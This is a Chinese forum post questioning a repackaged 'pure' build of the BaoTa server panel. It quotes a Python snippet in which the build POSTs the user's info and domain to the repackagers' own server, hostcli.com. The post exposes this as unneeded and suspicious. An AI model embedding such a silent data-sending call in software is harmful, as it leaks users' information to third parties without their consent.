看了下 纯净版,只是把 宝塔的提交地址改成了自己的。
纯净版 肯定是剔除掉不影响使用的后台代码,他们改成了自己的后台。
举个例子:
- check_domain_path = ‘/www/server/panel/data/check_domain/’
- if not os.path.exists(check_domain_path):
- os.makedirs(check_domain_path,384)
- pdata = get_user_info()
- pdata[‘domain’] = domain
- result = httpPost(‘https://v7.hostcli.com/api/panel/check_domain’,pdata)
- cd_file = check_domain_path + domain +’.pl’
复制代码
这玩意就是查找域名信息提交走,并不影响任何功能使用,不剔除留着干啥?还往自己地址上POST ,他们TG群里说的意思是 只返回 "ok",没有收集逻辑,这是吃饱了撑的,还专门 post 一下,直接 result = "ok" 不行么~
然后 tg 上质疑了一下,就给我 t 了 哈哈 |